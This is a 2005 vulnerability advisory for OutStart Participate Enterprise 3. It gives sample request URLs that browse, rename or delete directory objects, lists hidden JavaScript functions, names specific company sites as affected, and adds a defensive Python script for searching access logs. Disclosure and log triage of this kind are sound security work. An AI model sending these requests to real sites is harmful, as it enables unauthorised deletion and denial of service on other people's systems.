--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
--------------------------------------------------------
[Updated last on 11 MAR 2005]
(Altrus::security.honour.ca)

Program name: Participate Enterprises 3
Versions affected: OutStart Participate Enterprise 3
Versions not vulnerable: PE-3.2.1.0120 PE-3.3.1.0231 PE-3.4.0205 PE-3.5.0032 PE-3.7.0042 and higher.
Vendor(s): Outstart Inc.
           Participate Systems Inc.
Vendor Notification Date: 23 FEB 2005
CVE: CAN-2005-0685
BugTraq ID: 12752
Risk: Moderately Serious
Impact: Denial of Service, File Upload
Vendor Homepages: http://www.outstart.com
                  http://www.participate.com

---------------------------------------------------------
- Description
---------------------------------------------------------
PE is a proprietary Java-based community that mimics the functionality
provided by existing open-source software. It facilitates community forums,
document libraries, message boards, user interaction and a user management
infrastructure.

From vendor site:
Available as either a hosted or installed solution, OutStart Participate is
improving the collaboration and knowledge-sharing capabilities of many
world-class companies, including GE Healthcare, Caremark, palmOne, Logitech,
McGraw-Hill and Tivo. OutStart Participate combines three different systems
into one powerful knowledge-sharing platform.

---------------------------------------------------------
- Discussion
---------------------------------------------------------
The software is affected by an Access Validation Error that could allow a
malicious user to rename or delete critical directory objects. This could
result in a denial of service of all library, forum, and/or specialized
content until the directory objects were restored or renamed appropriately.
The vendor has been notified of this issue, and has developed a patch.
Sites and persons using the software are advised to install the patch,
available from the vendor.

Affected sites include:
http://www.les-fontaines-community.com/pe/repository/displaynavigator.jsp
http://forums.palmone.com/pe/repository/displaynavigator.jsp
http://tivo.participate.com/pe/index.jsp
http://pluggedin.palmone.com/regac/pluggedin/login.jsp
http://logitech.participate.com/index.html
http://auditorium.audi.com/pe/index.jsp
http://mcgraw.participate.com/pe/index.jsp
http://thomson.participate.com/index.html

---------------------------------------------------------
- Sample Exploit Code
---------------------------------------------------------
http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=101
-Allows an attacker to browse a limited directory tree (in this case, the
 action directory). rootFolder=105 allows for the document library to be
 browsed.

http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selectedObject=101
-Allows an attacker to rename the selected object ID (in this case, the
 action directory).

http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
-Sets the object CSV for the delete navigator.

The following JavaScript commands might also be used to call functions
otherwise unavailable to the user:

showDeleteView()
showWebFolderView()
showLibraryView()
showMyLibraryView()
singleSelectObject(objid)
processRadioSelection(radio, objid)
processCheckboxSelection(chkbox, objid)
addToSelectedObjects(objid)
removeFromSelectedObjects(objid)
performAction()

---------------------------------------------------------
- Solutions
---------------------------------------------------------
The vendor has updated all versions of affected software. Implementation of
this update is confirmed 11 MAR 2005.
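
For sites reviewing their own web server logs for use of the requests listed
above, the following is an added example (not part of the original advisory
and not vendor code). It assumes combined-format access logs; the sample log
lines, the function name triage() and the severity labels are constructed for
illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints and parameters named in the advisory -> action label (labels are assumptions)
WATCHED = {
    "/pe/repository/displaynavigator.jsp": ("rootFolder", "browse"),
    "/pe/repository/include/renamepopup.jsp": ("selectedObject", "rename"),
    "/pe/repository/displaydeletenavigator.jsp": ("selectedObjectsCSV", "delete"),
}
# Object IDs the advisory identifies: 101 = action directory, 105 = document library
CRITICAL_IDS = {"101", "105"}
# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def triage(lines):
    """Return one finding per request that hits an endpoint from the advisory."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, user, target, status = m.groups()
        url = urlsplit(target)
        # Java containers may append ";jsessionid=..." to the path; strip it first
        path = url.path.split(";")[0].lower()
        if path not in WATCHED:
            continue
        param, action = WATCHED[path]
        # parse_qs percent-decodes, so "333%2C101" is split like "333,101"
        ids = set()
        for value in parse_qs(url.query).get(param, []):
            ids.update(v.strip() for v in value.split(",") if v.strip())
        if not ids:
            continue
        # Rename/delete aimed at a critical directory object is the DoS case described
        high = action in ("rename", "delete") and bool(ids & CRITICAL_IDS)
        findings.append({"ip": ip, "user": user, "action": action, "ids": sorted(ids),
                         "status": int(status), "severity": "high" if high else "review"})
    return findings

# Constructed sample log lines (documentation IP ranges, not from a real server)
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Mar/2005:10:02:11 +0000] "GET /pe/repository/displaynavigator.jsp?rootFolder=105 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Mar/2005:10:02:40 +0000] "GET /pe/repository/include/renamepopup.jsp?selectedObject=101 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [11/Mar/2005:10:03:02 +0000] "GET /pe/repository/displaydeletenavigator.jsp;jsessionid=ABC?selectedObjectsCSV=333%2C101 HTTP/1.1" 200 1900',
    '203.0.113.9 - alice [11/Mar/2005:10:05:00 +0000] "GET /pe/index.jsp HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*triage(SAMPLE_LOG), sep="\n")
```

Authorized users reach the same pages during normal use, so findings are
triage leads to correlate with the logged user and session, not proof of abuse.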

---------------------------------------------------------
- References
---------------------------------------------------------
Authoritative and updated copies of this vulnerability can be found at:
http://security.honour.ca

---------------------------------------------------------
- Credits
---------------------------------------------------------
Discovered by: Altrus [root@honour.ca]